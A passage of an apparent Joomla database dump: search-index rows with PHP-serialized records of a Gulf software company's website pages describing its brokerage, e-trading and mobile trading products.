User\";s:6:\"layout\";s:7:\"article\";s:4:\"path\";s:39:\"index.php/about-us/79-pages/84-about-us\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:5:\"Pages\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:5:\"Pages\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:5:\"en-GB\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:5:\"en-GB\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:47:\"index.php?option=com_content&view=article&id=84\";s:5:\"route\";s:82:\"index.php?option=com_content&view=article&id=84:about-us&catid=79:pages&Itemid=678\";s:5:\"title\";s:8:\"About Us\";s:11:\"description\";s:2301:\"Established in 1999, FIRST Information Technology (FIT) is a software solutions provider based in the GCC with offices in Oman, UAE and Jordan, partners in Saudi Arabia, Qatar, Egypt and Syria. Focused on the financial services products - markets sector - mainly investment management solutions (brokerage, fund management, portfolio management, order management solution, risk management, index management, information dissemination and other industry specific solutions) FIT as a leader solution provider in the region, has the largest portfolio clients based in the GCC. FIT was the first provider hits the Trading Engine for Muscat, Dubai, Abu Dhabi, NASDAQ Dubai, Qatar, Jordan and Damascus Stock Exchanges. The core solutions provided by FIT offer the widest breadth of functionality in the region. The functionality encompasses the following: brokerage management, portfolio management, fund management, research, order management, index management, FIX protocol, STPintegration, portals, and internet / mobile trading, risk management, VIP service centre. FIT is working closely with the regional stock exchanges either as consultant or solution provider such as Dubai Financial Market portal, information dissemination website, Muscat Securities Marker website and Khartoum Stock Exchange trading engine. Vision Be the regional selected choice of technology partner in delivering Brokerage & Financial Investment Applications. Mission15pt; width: 1343pt; padding-left: 30px;\" width=\"1790\" height=\"20\"> Provide better services to enhance the operational efficiency of our clients. This statement served as a cornerstone for maximizing the added value we deliver to our clients. Having this in mind and in order to bring the state of art technology to our region, we established the FIRST Information Technology FIT to achieve those goals among others. We look at information and data of any enterprise as part of its valuable assets, so it has to be preserved, maintained, and fully taken care off. By providing Investment solutions to the enterprise, we believe we will accomplish our mission. The systems and software applications that we developed take care of the current needs as well as the future expansions and requirements without loosing the investment in both hardware and software.\";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:5:\"en-GB\";s:18:\"publish_start_date\";s:19:\"2013-12-09 05:09:51\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2013-12-09 05:09:51\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:3;s:15:\"defaultLanguage\";s:5:\"en-GB\";}'),(40,'index.php?option=com_content&view=article&id=116','index.php?option=com_content&view=article&id=116:products-investment-soltuions&catid=14:sample-data-articles&Itemid=435','Products : Investment Soltuions','Brokerage Management Solution (WASATA) WASATA is a complete trading system developed to provide a user friendly, fast and effective electronic trading system for Banks, Brokerage Companies and other stakeholders involved in capital markets. WASATA is a se','2015-04-09 03:18:42','b9edd86b1695c0c94bb634fc6f465739',1,1,1,'en-GB','2015-04-08 08:48:33','0000-00-00 00:00:00','2015-04-08 08:48:33','0000-00-00 00:00:00',0,0,3,'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:24:{s:2:\"id\";s:3:\"116\";s:5:\"alias\";s:29:\"products-investment-soltuions\";s:7:\"summary\";s:2112:\"<p><span style=\"text-decoration: underline;\"><strong><span lang=\"EN-GB\" style=\"font-family: \'Times New Roman\',\'serif\'; font-size: 12pt; mso-fareast-font-family: \'Times New Roman\'; mso-ansi-language: EN-GB; mso-fareast-language: EN-US; mso-bidi-language: AR-SA;\"><span style=\"color: #000000;\"><span lang=\"EN-GB\" style=\"font-family: \'Century Gothic\',\'sans-serif\'; font-size: 12pt; mso-fareast-font-family: \'Times New Roman\'; mso-ansi-language: EN-GB; mso-fareast-language: EN-US; mso-bidi-language: AR-SA; mso-bidi-font-family: \'Times New Roman\';\">Brokerage Management Solution (WASATA)</span></span></span></strong></span></p>\r\n<p> </p>\r\n<p style=\"margin: 0in 0in 0pt; text-align: justify; mso-outline-level: 1;\"><b><i><span lang=\"EN-GB\" style=\"font-family: \'Century Gothic\',\'sans-serif\'; font-size: 14pt; mso-ansi-language: EN-GB; mso-bidi-font-family: Arial;\"><span style=\"color: #000000;\">WASATA</span></span></i></b><span lang=\"EN-GB\" style=\"font-family: \'Century Gothic\',\'sans-serif\'; font-size: 11pt; mso-ansi-language: EN-GB;\"><span style=\"color: #000000;\">is a complete trading system developed to provide a user friendly, fast and effective electronic trading system for Banks, Brokerage Companies and other stakeholders involved in capital markets. </span></span></p>\r\n<p> </p>\r\n<p style=\"margin: 0in 0in 0pt; text-align: justify; mso-outline-level: 1;\"><span lang=\"EN-GB\" style=\"font-family: \'Century Gothic\',\'sans-serif\'; font-size: 11pt; mso-ansi-language: EN-GB;\"><span style=\"color: #000000;\"> </span></span><b><i><span lang=\"EN-GB\" style=\"font-family: \'Century Gothic\',\'sans-serif\'; font-size: 14pt; mso-ansi-language: EN-GB; mso-bidi-font-family: Arial;\"><span style=\"color: #000000;\">WASATA</span></span></i></b><span lang=\"EN-GB\" style=\"font-family: \'Century Gothic\',\'sans-serif\'; font-size: 11pt; mso-ansi-language: EN-GB;\"><span style=\"color: #000000;\">is a set of modules developed to manage, in an integrated mode, the functionalities required for the administration of securities, asset management, order collections and distribution of financial products. </span></span></p>\r\n<p> </p>\";s:4:\"body\";s:0:\"\";s:5:\"catid\";s:2:\"14\";s:10:\"created_by\";s:3:\"736\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2015-04-09 07:18:39\";s:11:\"modified_by\";s:3:\"736\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":69:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"0\";s:20:\"link_parent_category\";s:1:\"0\";s:11:\"show_author\";s:1:\"1\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"1\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"0\";s:20:\"show_item_navigation\";s:1:\"0\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"0\";s:14:\"readmore_limit\";s:3:\"100\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"1\";s:9:\"show_hits\";s:1:\"0\";s:11:\"show_noauth\";s:1:\"0\";s:13:\"urls_position\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:25:\"show_urls_images_frontend\";s:1:\"1\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:5:\"right\";s:14:\"float_fulltext\";s:5:\"right\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"4\";s:11:\"num_columns\";s:1:\"2\";s:9:\"num_links\";s:1:\"4\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"1\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"2\";s:23:\"show_pagination_results\";s:1:\"1\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"0\";}}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}}s:7:\"version\";s:1:\"3\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:20:\"Sample Data-Articles\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:33:\"116:products-investment-soltuions\";s:7:\"catslug\";s:23:\"14:sample-data-articles\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:4:\"path\";s:67:\"index.php/14-sample-data-articles/116-products-investment-soltuions\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:20:\"Sample Data-Articles\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:20:\"Sample Data-Articles\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:5:\"en-GB\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:5:\"en-GB\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:48:\"index.php?option=com_content&view=article&id=116\";s:5:\"route\";s:119:\"index.php?option=com_content&view=article&id=116:products-investment-soltuions&catid=14:sample-data-articles&Itemid=435\";s:5:\"title\";s:31:\"Products : Investment Soltuions\";s:11:\"description\";s:453:\"Brokerage Management Solution (WASATA) WASATA is a complete trading system developed to provide a user friendly, fast and effective electronic trading system for Banks, Brokerage Companies and other stakeholders involved in capital markets. WASATA is a set of modules developed to manage, in an integrated mode, the functionalities required for the administration of securities, asset management, order collections anddistribution of financial products.\";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:5:\"en-GB\";s:18:\"publish_start_date\";s:19:\"2015-04-08 08:48:33\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2015-04-08 08:48:33\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:3;s:15:\"defaultLanguage\";s:5:\"en-GB\";}'),(52,'index.php?option=com_content&view=article&id=121','index.php?option=com_content&view=article&id=121:e-trade-web-based-solution&catid=14:sample-data-articles&Itemid=435','E-Trade – Web based solution','a. Flexibility of e-Trade Design. b. Online integration with back office system c. Real time prices.Gothic\',sans-serif; mso-fareast-font-family: \'Century Gothic\'; mso-bidi-font-family: \'Century Gothic\';\"> d. Multi tabs design. e. Tightly Coupling and conn','2015-04-12 15:10:57','6647442e8f1733e26f72068ee86bacbd',1,1,1,'en-GB','2015-04-12 19:01:36','0000-00-00 00:00:00','2015-04-12 19:01:36','0000-00-00 00:00:00',0,0,3,'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:24:{s:2:\"id\";s:3:\"121\";s:5:\"alias\";s:26:\"e-trade-web-based-solution\";s:7:\"summary\";s:5684:\"<p class=\"MsoListParagraph\" style=\"margin-left: 1.5in; text-indent: -.25in; mso-list: l0 level2 lfo1;\"> </p>\r\n<p class=\"MsoListParagraphCxSpFirst\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"><!-- [if !supportLists]--><b><span style=\"font-family: \'Century Gothic\',sans-serif; mso-fareast-font-family: \'Century Gothic\'; mso-bidi-font-family: \'Century Gothic\';\">a.<span style=\"font-weight: normal; font-stretch: normal; font-size: 7pt; line-height: normal; font-family: \'Times New Roman\';\"> </span></span></b><!--[endif]--><b><span style=\"font-family: \'Century Gothic\',sans-serif;\">Flexibility of e-Trade Design.</span></b></p>\r\n<p class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"><!-- [if !supportLists]--><b><span style=\"font-family: \'Century Gothic\',sans-serif; mso-fareast-font-family: \'Century Gothic\'; mso-bidi-font-family: \'Century Gothic\';\">b.<span style=\"font-weight: normal; font-stretch: normal; font-size: 7pt; line-height: normal; font-family: \'Times New Roman\';\"> </span></span></b><!--[endif]--><b><span style=\"font-family: \'Century Gothic\',sans-serif;\">Online integration with back office system</span></b></p>\r\n<p class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"><!-- [if !supportLists]--><b><span style=\"font-family: \'Century Gothic\',sans-serif; mso-fareast-font-family: \'Century Gothic\'; mso-bidi-font-family: \'Century Gothic\';\">c.<span style=\"font-weight: normal; font-stretch: normal; font-size: 7pt; line-height: normal; font-family: \'Times New Roman\';\"> </span></span></b><!--[endif]--><b><span style=\"font-family: \'Century Gothic\',sans-serif;\">Real time prices.</span></b></p>\r\n<p class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"><!-- [if !supportLists]--><b><span style=\"font-family: \'Century Gothic\',sans-serif; mso-fareast-font-family: \'Century Gothic\'; mso-bidi-font-family: \'Century Gothic\';\">d.<span style=\"font-weight: normal; font-stretch: normal; font-size: 7pt; line-height: normal; font-family: \'Times New Roman\';\"> </span></span></b><!--[endif]--><b><span style=\"font-family: \'Century Gothic\',sans-serif;\">Multi tabs design.</span></b></p>\r\n<p class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"><!-- [if !supportLists]--><b><span style=\"font-family: \'Century Gothic\',sans-serif; mso-fareast-font-family: \'Century Gothic\'; mso-bidi-font-family: \'Century Gothic\';\">e.<span style=\"font-weight: normal; font-stretch: normal; font-size: 7pt; line-height: normal; font-family: \'Times New Roman\';\"> </span></span></b><!--[endif]--><b><span style=\"font-family: \'Century Gothic\',sans-serif;\">Tightly Coupling and connectivity among the screens</span></b></p>\r\n<p class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"><!-- [if !supportLists]--><b><span style=\"font-family: \'Century Gothic\',sans-serif; mso-fareast-font-family: \'Century Gothic\'; mso-bidi-font-family: \'Century Gothic\';\">f.<span style=\"font-weight: normal; font-stretch: normal; font-size: 7pt; line-height: normal; font-family: \'Times New Roman\';\"> </span></span></b><!--[endif]--><b><span style=\"font-family: \'Century Gothic\',sans-serif;\">Advance menu driven system</span></b></p>\r\n<p class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"><!-- [if !supportLists]--><b><span style=\"font-family: \'Century Gothic\',sans-serif; mso-fareast-font-family: \'Century Gothic\'; mso-bidi-font-family: \'Century Gothic\';\">g.<span style=\"font-weight: normal; font-stretch: normal; font-size: 7pt; line-height: normal; font-family: \'Times New Roman\';\"> </span></span></b><!--[endif]--><b><span style=\"font-family: \'Century Gothic\',sans-serif;\">High performance data processing and order routing</span></b></p>\r\n<p class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"><!-- [if !supportLists]--><b><span style=\"font-family: \'Century Gothic\',sans-serif; mso-fareast-font-family: \'Century Gothic\'; mso-bidi-font-family: \'Century Gothic\';\">h.<span style=\"font-weight: normal; font-stretch: normal; font-size: 7pt; line-height: normal; font-family: \'Times New Roman\';\"> </span></span></b><!--[endif]--><b><span style=\"font-family: \'Century Gothic\',sans-serif;\">Order Execution from different screens </span></b></p>\r\n<p class=\"MsoListParagraph\" style=\"margin-left: 1.5in; text-indent: -.25in; mso-list: l0 level2 lfo1;\"><b style=\"text-indent: -0.25in; font-size: 12.1599998474121px; line-height: 1.3em;\"><span style=\"font-family: \'Century Gothic\',sans-serif; mso-fareast-font-family: \'Century Gothic\'; mso-bidi-font-family: \'Century Gothic\';\">i.<span style=\"font-weight: normal; font-stretch: normal; font-size: 7pt; line-height: normal; font-family: \'Times New Roman\';\"> </span></span></b><b style=\"text-indent: -0.25in; font-size: 12.1599998474121px; line-height: 1.3em;\"><span style=\"font-family: \'Century Gothic\',sans-serif;\">Quick Order Entry Screen</span></b></p>\r\n<p class=\"MsoListParagraph\" style=\"margin-left: 1.5in; text-indent: -.25in; mso-list: l0 level2 lfo1;\"> </p>\r\n<p class=\"MsoListParagraph\" style=\"margin-left: 1.5in; text-indent: -.25in; mso-list: l0 level2 lfo1;\"> <a href=\"mailto: info@fitoman.com\">More Details</a></p>\";s:4:\"body\";s:0:\"\";s:5:\"catid\";s:2:\"14\";s:10:\"created_by\";s:3:\"736\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2015-04-12 19:10:57\";s:11:\"modified_by\";s:3:\"736\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":69:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"0\";s:20:\"link_parent_category\";s:1:\"0\";s:11:\"show_author\";s:1:\"1\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"1\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"0\";s:20:\"show_item_navigation\";s:1:\"0\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"0\";s:14:\"readmore_limit\";s:3:\"100\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"1\";s:9:\"show_hits\";s:1:\"0\";s:11:\"show_noauth\";s:1:\"0\";s:13:\"urls_position\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:25:\"show_urls_images_frontend\";s:1:\"1\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:5:\"right\";s:14:\"float_fulltext\";s:5:\"right\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"4\";s:11:\"num_columns\";s:1:\"2\";s:9:\"num_links\";s:1:\"4\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"1\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"2\";s:23:\"show_pagination_results\";s:1:\"1\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"0\";}}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}}s:7:\"version\";s:1:\"2\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:20:\"Sample Data-Articles\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:30:\"121:e-trade-web-based-solution\";s:7:\"catslug\";s:23:\"14:sample-data-articles\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:4:\"path\";s:64:\"index.php/14-sample-data-articles/121-e-trade-web-based-solution\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:20:\"Sample Data-Articles\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:20:\"Sample Data-Articles\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:5:\"en-GB\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:5:\"en-GB\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:48:\"index.php?option=com_content&view=article&id=121\";s:5:\"route\";s:116:\"index.php?option=com_content&view=article&id=121:e-trade-web-based-solution&catid=14:sample-data-articles&Itemid=435\";s:5:\"title\";s:30:\"E-Trade – Web based solution\";s:11:\"description\";s:469:\"a. Flexibility of e-Trade Design. b. Online integration with back office system c. Real time prices.Gothic\',sans-serif; mso-fareast-font-family: \'Century Gothic\'; mso-bidi-font-family: \'Century Gothic\';\"> d. Multi tabs design. e. Tightly Coupling and connectivity among the screens f. Advance menu driven system g.Gothic\',sans-serif;\"> High performance data processing and order routing h. Order Execution from different screens i. Quick Order Entry Screen More Details\";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:5:\"en-GB\";s:18:\"publish_start_date\";s:19:\"2015-04-12 19:01:36\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2015-04-12 19:01:36\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:3;s:15:\"defaultLanguage\";s:5:\"en-GB\";}'),(55,'index.php?option=com_content&view=article&id=122','index.php?option=com_content&view=article&id=122:mobile-tablet-trading-information-dissemination&catid=14:sample-data-articles&Itemid=686','Mobile/Tablet Trading & Information Dissemination','a. Online integration with Back Office System b. Compatibility across a range of devices , HTML5 app will work on different mobile OS’s, whether that’s iOS, Android, Windows Phone or Blackberry c. Easy installation and maintenanceauto; text-indent: -.25in','2015-04-12 15:18:36','d02a460629a6cd098e22ab13c0036793',1,1,1,'en-GB','2015-04-12 19:01:36','0000-00-00 00:00:00','2015-04-12 19:01:36','0000-00-00 00:00:00',0,0,3,'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:24:{s:2:\"id\";s:3:\"122\";s:5:\"alias\";s:47:\"mobile-tablet-trading-information-dissemination\";s:7:\"summary\";s:2824:\"<p class=\"MsoListParagraph\" style=\"margin-left: 1.5in; text-indent: -.25in; mso-list: l0 level2 lfo1;\"> </p>\r\n<p class=\"MsoListParagraphCxSpFirst\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"><!-- [if !supportLists]--><b><span style=\"font-family: \'Century Gothic\',sans-serif; mso-fareast-font-family: \'Century Gothic\'; mso-bidi-font-family: \'Century Gothic\';\">a.<span style=\"font-weight: normal; font-stretch: normal; font-size: 7pt; line-height: normal; font-family: \'Times New Roman\';\"> </span></span></b><!--[endif]--><b><span style=\"font-family: \'Century Gothic\',sans-serif;\">Online integration with Back Office System</span></b></p>\r\n<p class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"><!-- [if !supportLists]--><b><span style=\"font-family: \'Century Gothic\',sans-serif; mso-fareast-font-family: \'Century Gothic\'; mso-bidi-font-family: \'Century Gothic\';\">b.<span style=\"font-weight: normal; font-stretch: normal; font-size: 7pt; line-height: normal; font-family: \'Times New Roman\';\"> </span></span></b><!--[endif]--><b><span style=\"font-family: \'Century Gothic\',sans-serif;\">Compatibility across a range of devices , HTML5 app will work on different mobile OS’s, whether that’s iOS, Android, Windows Phone or Blackberry</span></b></p>\r\n<p class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"><!-- [if !supportLists]--><b><span style=\"font-family: \'Century Gothic\',sans-serif; mso-fareast-font-family: \'Century Gothic\'; mso-bidi-font-family: \'Century Gothic\';\">c.<span style=\"font-weight: normal; font-stretch: normal; font-size: 7pt; line-height: normal; font-family: \'Times New Roman\';\"> 